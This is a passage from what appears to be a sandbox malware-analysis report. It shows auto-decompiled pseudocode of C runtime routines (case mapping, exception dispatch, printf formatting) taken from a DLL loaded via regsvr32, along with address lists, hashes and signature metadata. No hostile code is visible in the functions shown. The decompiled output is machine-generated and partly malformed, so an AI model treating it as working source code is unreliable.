				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
				_v56 = _v56 + 0x20;
				__ecx = _v56;
				__rdx = _a8;
				 *((char*)(_a8 + __rcx + 0x11d)) = __al;
				goto 0xf9d2aa1b;
				if (_v56 - 0x61 < 0) goto 0xf9d2aa04;
				if (_v56 - 0x7a > 0) goto 0xf9d2aa04;
				_v56 = _v56 + 1;
				__rcx = _a8;
				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000020;
				_v56 = _v56 + 1;
				__rdx = _a8;
				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
				_v56 = _v56 - 0x20;
				__ecx = _v56;
				__rdx = _a8;
				 *((char*)(__rdx + __rcx + 0x11d)) = __al;
				goto 0xf9d2aa1b;
				__eax = _v56;
				__rcx = _a8;
				 *((char*)(_a8 + __rax + 0x11d)) = 0;
				goto L2;
				__rcx = _v24;
				__rcx = _v24 ^ __rsp;
				return E000007FE7FEF9D23280(_v56, _v56, __edx, _v24 ^ __rsp, __rdx, __r8);
			}























                                                      0x7fef9d2a5e0
                                                      0x7fef9d2a5e0
                                                      0x7fef9d2a5ec
                                                      0x7fef9d2a5f6
                                                      0x7fef9d2a619
                                                      0x7fef9d2a61f
                                                      0x7fef9d2a62a
                                                      0x7fef9d2a635
                                                      0x7fef9d2a647
                                                      0x7fef9d2a658
                                                      0x7fef9d2a65f
                                                      0x7fef9d2a661
                                                      0x7fef9d2a671
                                                      0x7fef9d2a679
                                                      0x7fef9d2a687
                                                      0x7fef9d2a69c
                                                      0x7fef9d2a6a9
                                                      0x7fef9d2a6b0
                                                      0x7fef9d2a6bb
                                                      0x7fef9d2a6c2
                                                      0x7fef9d2a6d5
                                                      0x7fef9d2a6de
                                                      0x7fef9d2a6e6
                                                      0x7fef9d2a6e8
                                                      0x7fef9d2a6ea
                                                      0x7fef9d2a6fd
                                                      0x7fef9d2a70c
                                                      0x7fef9d2a715
                                                      0x7fef9d2a71a
                                                      0x7fef9d2a72f
                                                      0x7fef9d2a734
                                                      0x7fef9d2a747
                                                      0x7fef9d2a74b
                                                      0x7fef9d2a75b
                                                      0x7fef9d2a760
                                                      0x7fef9d2a770
                                                      0x7fef9d2a783
                                                      0x7fef9d2a788
                                                      0x7fef9d2a79b
                                                      0x7fef9d2a79f
                                                      0x7fef9d2a7af
                                                      0x7fef9d2a7b4
                                                      0x7fef9d2a7c4
                                                      0x7fef9d2a7ca
                                                      0x7fef9d2a7d7
                                                      0x7fef9d2a7dc
                                                      0x7fef9d2a7f2
                                                      0x7fef9d2a804
                                                      0x7fef9d2a81b
                                                      0x7fef9d2a828
                                                      0x7fef9d2a84b
                                                      0x7fef9d2a86d
                                                      0x7fef9d2a874
                                                      0x7fef9d2a88a
                                                      0x7fef9d2a897
                                                      0x7fef9d2a8ba
                                                      0x7fef9d2a8dc
                                                      0x7fef9d2a8e3
                                                      0x7fef9d2a8f4
                                                      0x7fef9d2a8fc
                                                      0x7fef9d2a901
                                                      0x7fef9d2a906
                                                      0x7fef9d2a91a
                                                      0x7fef9d2a91c
                                                      0x7fef9d2a92e
                                                      0x7fef9d2a93c
                                                      0x7fef9d2a946
                                                      0x7fef9d2a94f
                                                      0x7fef9d2a953
                                                      0x7fef9d2a960
                                                      0x7fef9d2a96a
                                                      0x7fef9d2a96e
                                                      0x7fef9d2a976
                                                      0x7fef9d2a981
                                                      0x7fef9d2a984
                                                      0x7fef9d2a98b
                                                      0x7fef9d2a993
                                                      0x7fef9d2a99a
                                                      0x7fef9d2a9a4
                                                      0x7fef9d2a9ae
                                                      0x7fef9d2a9b7
                                                      0x7fef9d2a9bb
                                                      0x7fef9d2a9c8
                                                      0x7fef9d2a9d2
                                                      0x7fef9d2a9d6
                                                      0x7fef9d2a9de
                                                      0x7fef9d2a9e9
                                                      0x7fef9d2a9ec
                                                      0x7fef9d2a9f3
                                                      0x7fef9d2a9fb
                                                      0x7fef9d2aa02
                                                      0x7fef9d2aa04
                                                      0x7fef9d2aa0b
                                                      0x7fef9d2aa13
                                                      0x7fef9d2aa1b
                                                      0x7fef9d2aa20
                                                      0x7fef9d2aa28
                                                      0x7fef9d2aa37

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID: $z
                                                      • API String ID: 1807457897-2251613814
                                                      • Opcode ID: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                      • Instruction ID: 4853ceba84ddbb230417778543f3b3b02ea2aa858227094ccd1c634e11d49f23
                                                      • Opcode Fuzzy Hash: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                      • Instruction Fuzzy Hash: C8B1B77261CAC0CAD7B58B29E8807AFB7E0F388785F155125DAC983B99DB2DD4429F00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D34960 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 175COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 35%
                                                      			E000007FE7FEF9D34960(void* __ecx, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int _a40, intOrPtr _a48, long long _a56, long long _a64) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				char _v60;
				char _v64;
				signed int _v72;
				char _v80;
				char _v88;
				long long _v96;
				intOrPtr _v104;
				long long _v112;
				long long _v120;
				long long _v128;
				signed int _v136;
				void* _t106;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				long long _t153;
				signed int _t161;
				signed int _t165;
				long long _t166;
				long long _t169;
				long long _t170;
				intOrPtr _t174;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_t153 = _a8;
				if ( *_t153 != 0x80000003) goto 0xf9d34990;
				goto 0xf9d34cc6;
				0xf9d24000();
				if ( *((long long*)(_t153 + 0xe0)) == 0) goto 0xf9d34a33;
				0xf9d24000();
				_v56 = _t153;
				E000007FE7FEF9D23D00(_t106);
				if ( *((intOrPtr*)(_v56 + 0xe0)) == _t153) goto 0xf9d34a33;
				if ( *_a8 == 0xe0434f4d) goto 0xf9d34a33;
				if ( *_a8 == 0xe0434352) goto 0xf9d34a33;
				_v120 = _a64;
				_v128 = _a56;
				_v136 = _a40;
				if (E000007FE7FEF9D2E9B0(_a8, _a16, _a24, _a32) == 0) goto 0xf9d34a33;
				goto 0xf9d34cc6;
				if ( *((intOrPtr*)(_a40 + 0xc)) == 0) goto 0xf9d34a43;
				goto 0xf9d34a48;
				E000007FE7FEF9D2CF80(_a40);
				_v120 = _a32;
				_v128 =  &_v60;
				_t161 =  &_v64;
				_v136 = _t161;
				r9d = _a48;
				r8d = _a56;
				E000007FE7FEF9D2EA30(_a16, _a40);
				_v72 = _t161;
				_v64 = _v64 + 1;
				_v72 = _v72 + 0x14;
				if (_v64 - _v60 >= 0) goto 0xf9d34cc6;
				if (_a48 -  *_v72 < 0) goto 0xf9d34c2b;
				_t165 = _v72;
				if (_a48 -  *((intOrPtr*)(_t165 + 4)) > 0) goto 0xf9d34c2b;
				_t117 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t165 + 4)), _t165);
				_t166 = _t165 +  *((intOrPtr*)(_v72 + 0x10));
				if ( *((intOrPtr*)(_t166 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34b53;
				_t118 = E000007FE7FEF9D2E680(_t117, _t166);
				_v48 = _t166;
				_t119 = E000007FE7FEF9D2E680(_t118, _t166);
				_t169 = _v48 +  *((intOrPtr*)(_t166 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
				_v40 = _t169;
				goto 0xf9d34b5f;
				_v40 = 0;
				if (_v40 == 0) goto 0xf9d34bff;
				_t120 = E000007FE7FEF9D2E680(_t119, _t169);
				_t170 = _t169 +  *((intOrPtr*)(_v72 + 0x10));
				if ( *((intOrPtr*)(_t170 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34be3;
				_t121 = E000007FE7FEF9D2E680(_t120, _t170);
				_v32 = _t170;
				E000007FE7FEF9D2E680(_t121, _t170);
				_v24 = _v32 +  *((intOrPtr*)(_t170 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
				goto 0xf9d34bef;
				_v24 = 0;
				_t174 = _v24;
				if ( *((char*)(_t174 + 0x10)) != 0) goto 0xf9d34c2b;
				E000007FE7FEF9D2E680( *((char*)(_t174 + 0x10)), _t174);
				if (( *(_t174 +  *((intOrPtr*)(_v72 + 0x10)) + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14) & 0x00000040) == 0) goto 0xf9d34c30;
				goto L1;
				__eax = E000007FE7FEF9D2E680(__eax, __rax);
				_v72 =  *((intOrPtr*)(_v72 + 0x10));
				__rax = __rax +  *((intOrPtr*)(_v72 + 0x10));
				_v72 =  *((intOrPtr*)(_v72 + 0xc)) - 1;
				__rcx = ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
				__rax = __rax + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
				__eflags = __rax;
				_v80 = 0;
				_v88 = 1;
				__rcx = _a64;
				_v96 = _a64;
				_v104 = _a56;
				__rcx = _v72;
				_v112 = _v72;
				_v120 = 0;
				_v128 = __rax;
				__rax = _a40;
				_v136 = _a40;
				__r9 = _a32;
				__r8 = _a24;
				__rdx = _a16;
				__rcx = _a8;
				__eax = E000007FE7FEF9D35180(__edi, __esi, __esp, __eflags, _a8, _a16, _a24, _a32);
				goto L1;
				return __eax;
			}
































                                                      0x7fef9d34960
                                                      0x7fef9d34965
                                                      0x7fef9d3496a
                                                      0x7fef9d3496f
                                                      0x7fef9d3497b
                                                      0x7fef9d34989
                                                      0x7fef9d3498b
                                                      0x7fef9d34990
                                                      0x7fef9d3499d
                                                      0x7fef9d349a3
                                                      0x7fef9d349a8
                                                      0x7fef9d349ad
                                                      0x7fef9d349be
                                                      0x7fef9d349ce
                                                      0x7fef9d349de
                                                      0x7fef9d349e8
                                                      0x7fef9d349f4
                                                      0x7fef9d34a00
                                                      0x7fef9d34a2c
                                                      0x7fef9d34a2e
                                                      0x7fef9d34a3f
                                                      0x7fef9d34a41
                                                      0x7fef9d34a43
                                                      0x7fef9d34a50
                                                      0x7fef9d34a5a
                                                      0x7fef9d34a5f
                                                      0x7fef9d34a64
                                                      0x7fef9d34a69
                                                      0x7fef9d34a71
                                                      0x7fef9d34a89
                                                      0x7fef9d34a8e
                                                      0x7fef9d34a9b
                                                      0x7fef9d34aa8
                                                      0x7fef9d34ab5
                                                      0x7fef9d34ac9
                                                      0x7fef9d34acf
                                                      0x7fef9d34ade
                                                      0x7fef9d34ae4
                                                      0x7fef9d34af2
                                                      0x7fef9d34b0b
                                                      0x7fef9d34b0d
                                                      0x7fef9d34b12
                                                      0x7fef9d34b17
                                                      0x7fef9d34b46
                                                      0x7fef9d34b49
                                                      0x7fef9d34b51
                                                      0x7fef9d34b53
                                                      0x7fef9d34b68
                                                      0x7fef9d34b6e
                                                      0x7fef9d34b7c
                                                      0x7fef9d34b95
                                                      0x7fef9d34b97
                                                      0x7fef9d34b9c
                                                      0x7fef9d34ba4
                                                      0x7fef9d34bd9
                                                      0x7fef9d34be1
                                                      0x7fef9d34be3
                                                      0x7fef9d34bef
                                                      0x7fef9d34bfd
                                                      0x7fef9d34bff
                                                      0x7fef9d34c29
                                                      0x7fef9d34c2b
                                                      0x7fef9d34c30
                                                      0x7fef9d34c3a
                                                      0x7fef9d34c3e
                                                      0x7fef9d34c4b
                                                      0x7fef9d34c4e
                                                      0x7fef9d34c52
                                                      0x7fef9d34c52
                                                      0x7fef9d34c55
                                                      0x7fef9d34c5a
                                                      0x7fef9d34c5f
                                                      0x7fef9d34c67
                                                      0x7fef9d34c73
                                                      0x7fef9d34c77
                                                      0x7fef9d34c7c
                                                      0x7fef9d34c81
                                                      0x7fef9d34c8a
                                                      0x7fef9d34c8f
                                                      0x7fef9d34c97
                                                      0x7fef9d34c9c
                                                      0x7fef9d34ca4
                                                      0x7fef9d34cac
                                                      0x7fef9d34cb4
                                                      0x7fef9d34cbc
                                                      0x7fef9d34cc1
                                                      0x7fef9d34ccd

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MOC$RCC
                                                      • API String ID: 0-2084237596
                                                      • Opcode ID: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                      • Instruction ID: 969568d65f9d334bdbb71439fdfa9ac9293f65c07e2bfce327525da45f7ede8f
                                                      • Opcode Fuzzy Hash: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                      • Instruction Fuzzy Hash: FA91193260DB8582DAA4DB55E49077EB3A0F7C4785F214526EACE83BA9CF3DE041CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D29C10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale_unlock$UpdateUpdate::~___updatetmbcinfo
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbctype.c
                                                      • API String ID: 4112623284-4095683531
                                                      • Opcode ID: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                      • Instruction ID: 45fc69fecf93984735d9c4b87304ebe4c96837b84e7424b4db74fc1719c3d08d
                                                      • Opcode Fuzzy Hash: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                      • Instruction Fuzzy Hash: 83911D36619B8586E7A08B19E98036E77E0F388798F654236EACD477B8CB3DD541CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3C6F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 19%
                                                      			E000007FE7FEF9D3C6F8(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
				signed int _t217;
				signed char _t222;
				intOrPtr _t257;
				signed int _t332;
				signed int _t333;
				signed long long _t336;
				intOrPtr* _t359;
				signed long long _t384;

				_t332 = __rax;
				_a116 = 0x10;
				asm("bts eax, 0xf");
				_a708 = 7;
				_a708 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
				_a84 = 0x30;
				_a85 = _a708 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t332;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t332;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
				_t333 = E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t333;
				goto 0xf9d3c80e;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t333;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t333;
				goto 0xf9d3c84b;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t333;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
				if (_a824 >= 0) goto 0xf9d3c882;
				_a832 =  ~_a824;
				asm("bts eax, 0x8");
				goto 0xf9d3c892;
				_t336 = _a824;
				_a832 = _t336;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
				_a832 = _a832 & _t336;
				if (_a116 >= 0) goto 0xf9d3c8d8;
				_a116 = 1;
				goto 0xf9d3c8f5;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
				_a116 = 0x200;
				if (_a832 != 0) goto 0xf9d3c908;
				_a92 = 0;
				_a64 =  &_a687;
				_t217 = _a116;
				_a116 = _a116 - 1;
				if (_t217 > 0) goto 0xf9d3c936;
				if (_a832 == 0) goto 0xf9d3c9d3;
				_a1040 = _a72;
				_a816 = _t217 / _a1040 + 0x30;
				_a1048 = _a72;
				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
				_t222 = _a816 + _a708;
				_a816 = _t222;
				 *_a64 = _a816 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0xf9d3c915;
				_a104 = _t222;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
				if (_a104 == 0) goto 0xf9d3ca12;
				if ( *_a64 == 0x30) goto 0xf9d3ca31;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
				_a84 = 0x20;
				_a92 = 1;
				_a840 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
				if (_a76 == 0) goto 0xf9d3cc1d;
				if (_a104 <= 0) goto 0xf9d3cc1d;
				_a872 = 0;
				_a848 = _a64;
				_a856 = _a104;
				_a856 = _a856 - 1;
				if (_a856 == 0) goto 0xf9d3cc1b;
				_a1056 =  *_a848 & 0x0000ffff;
				r9d = _a1056 & 0x0000ffff;
				r8d = 6;
				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
				_a848 =  &(_a848[1]);
				if (_a872 != 0) goto 0xf9d3cbe5;
				if (_a860 != 0) goto 0xf9d3cbf2;
				_a688 = 0xffffffff;
				goto 0xf9d3cc1b;
				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
				goto 0xf9d3cb60;
				goto 0xf9d3cc3b;
				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
				if (_a688 < 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				if (_a96 == 0) goto 0xf9d3cc8e;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3b99c;
				if (_a704 == 0) goto 0xf9d3ccb4;
				if (_a704 == 7) goto 0xf9d3ccb4;
				_a1060 = 0;
				goto 0xf9d3ccbf;
				_a1060 = 1;
				_t257 = _a1060;
				_a876 = _t257;
				if (_a876 != 0) goto 0xf9d3cd05;
				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t359;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t257 != 1) goto 0xf9d3cd05;
				asm("int3");
				if (_a876 != 0) goto 0xf9d3cd61;
				0xf9d2ab30();
				 *_t359 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a912 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3cd80;
				_a916 = _a688;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t384, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}











                                                      0x7fef9d3c6f8
                                                      0x7fef9d3c6f8
                                                      0x7fef9d3c704
                                                      0x7fef9d3c70c
                                                      0x7fef9d3c719
                                                      0x7fef9d3c724
                                                      0x7fef9d3c737
                                                      0x7fef9d3c739
                                                      0x7fef9d3c748
                                                      0x7fef9d3c74c
                                                      0x7fef9d3c756
                                                      0x7fef9d3c769
                                                      0x7fef9d3c76f
                                                      0x7fef9d3c782
                                                      0x7fef9d3c78c
                                                      0x7fef9d3c791
                                                      0x7fef9d3c799
                                                      0x7fef9d3c7a9
                                                      0x7fef9d3c7b3
                                                      0x7fef9d3c7b8
                                                      0x7fef9d3c7c0
                                                      0x7fef9d3c7ce
                                                      0x7fef9d3c7d9
                                                      0x7fef9d3c7e8
                                                      0x7fef9d3c7ec
                                                      0x7fef9d3c7f4
                                                      0x7fef9d3c7fe
                                                      0x7fef9d3c806
                                                      0x7fef9d3c80e
                                                      0x7fef9d3c819
                                                      0x7fef9d3c823
                                                      0x7fef9d3c82a
                                                      0x7fef9d3c832
                                                      0x7fef9d3c83c
                                                      0x7fef9d3c843
                                                      0x7fef9d3c854
                                                      0x7fef9d3c85f
                                                      0x7fef9d3c86c
                                                      0x7fef9d3c878
                                                      0x7fef9d3c880
                                                      0x7fef9d3c882
                                                      0x7fef9d3c88a
                                                      0x7fef9d3c89d
                                                      0x7fef9d3c8aa
                                                      0x7fef9d3c8bf
                                                      0x7fef9d3c8cc
                                                      0x7fef9d3c8ce
                                                      0x7fef9d3c8d6
                                                      0x7fef9d3c8df
                                                      0x7fef9d3c8eb
                                                      0x7fef9d3c8ed
                                                      0x7fef9d3c8fe
                                                      0x7fef9d3c900
                                                      0x7fef9d3c910
                                                      0x7fef9d3c915
                                                      0x7fef9d3c91f
                                                      0x7fef9d3c925
                                                      0x7fef9d3c930
                                                      0x7fef9d3c93b
                                                      0x7fef9d3c95e
                                                      0x7fef9d3c96a
                                                      0x7fef9d3c997
                                                      0x7fef9d3c9a9
                                                      0x7fef9d3c9ab
                                                      0x7fef9d3c9bf
                                                      0x7fef9d3c9c9
                                                      0x7fef9d3c9ce
                                                      0x7fef9d3c9e0
                                                      0x7fef9d3c9ec
                                                      0x7fef9d3c9fc
                                                      0x7fef9d3ca03
                                                      0x7fef9d3ca10
                                                      0x7fef9d3ca1a
                                                      0x7fef9d3ca24
                                                      0x7fef9d3ca2d
                                                      0x7fef9d3ca36
                                                      0x7fef9d3ca45
                                                      0x7fef9d3ca52
                                                      0x7fef9d3ca54
                                                      0x7fef9d3ca59
                                                      0x7fef9d3ca61
                                                      0x7fef9d3ca6c
                                                      0x7fef9d3ca6e
                                                      0x7fef9d3ca73
                                                      0x7fef9d3ca7b
                                                      0x7fef9d3ca86
                                                      0x7fef9d3ca88
                                                      0x7fef9d3ca8d
                                                      0x7fef9d3caa5
                                                      0x7fef9d3cab5
                                                      0x7fef9d3cad0
                                                      0x7fef9d3caee
                                                      0x7fef9d3cafc
                                                      0x7fef9d3cb07
                                                      0x7fef9d3cb22
                                                      0x7fef9d3cb2c
                                                      0x7fef9d3cb37
                                                      0x7fef9d3cb3d
                                                      0x7fef9d3cb4d
                                                      0x7fef9d3cb59
                                                      0x7fef9d3cb70
                                                      0x7fef9d3cb79
                                                      0x7fef9d3cb8a
                                                      0x7fef9d3cb92
                                                      0x7fef9d3cb9b
                                                      0x7fef9d3cbb6
                                                      0x7fef9d3cbc9
                                                      0x7fef9d3cbd9
                                                      0x7fef9d3cbe3
                                                      0x7fef9d3cbe5
                                                      0x7fef9d3cbf0
                                                      0x7fef9d3cc11
                                                      0x7fef9d3cc16
                                                      0x7fef9d3cc1b
                                                      0x7fef9d3cc36
                                                      0x7fef9d3cc43
                                                      0x7fef9d3cc4e
                                                      0x7fef9d3cc69
                                                      0x7fef9d3cc74
                                                      0x7fef9d3cc80
                                                      0x7fef9d3cc85
                                                      0x7fef9d3cc8e
                                                      0x7fef9d3cc9b
                                                      0x7fef9d3cca5
                                                      0x7fef9d3cca7
                                                      0x7fef9d3ccb2
                                                      0x7fef9d3ccb4
                                                      0x7fef9d3ccbf
                                                      0x7fef9d3ccc6
                                                      0x7fef9d3ccd5
                                                      0x7fef9d3ccd7
                                                      0x7fef9d3ccde
                                                      0x7fef9d3cce3
                                                      0x7fef9d3cce6
                                                      0x7fef9d3ccf8
                                                      0x7fef9d3cd00
                                                      0x7fef9d3cd02
                                                      0x7fef9d3cd0d
                                                      0x7fef9d3cd0f
                                                      0x7fef9d3cd14
                                                      0x7fef9d3cd1a
                                                      0x7fef9d3cd23
                                                      0x7fef9d3cd3e
                                                      0x7fef9d3cd43
                                                      0x7fef9d3cd53
                                                      0x7fef9d3cd5f
                                                      0x7fef9d3cd68
                                                      0x7fef9d3cd74
                                                      0x7fef9d3cd97

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: get_int64_arg
                                                      • String ID: 0$9
                                                      • API String ID: 1967237116-1975997740
                                                      • Opcode ID: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                      • Instruction ID: c0a57250e5e6ff09cb8cd0b3e72d4402f8dee1629557039505579d47a847bcbd
                                                      • Opcode Fuzzy Hash: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                      • Instruction Fuzzy Hash: 1E41C87660DAC187E7B58B19E8917AEB7E4F385791F100125EBC886B98DBBDD540CF00
                                                      Uniqueness

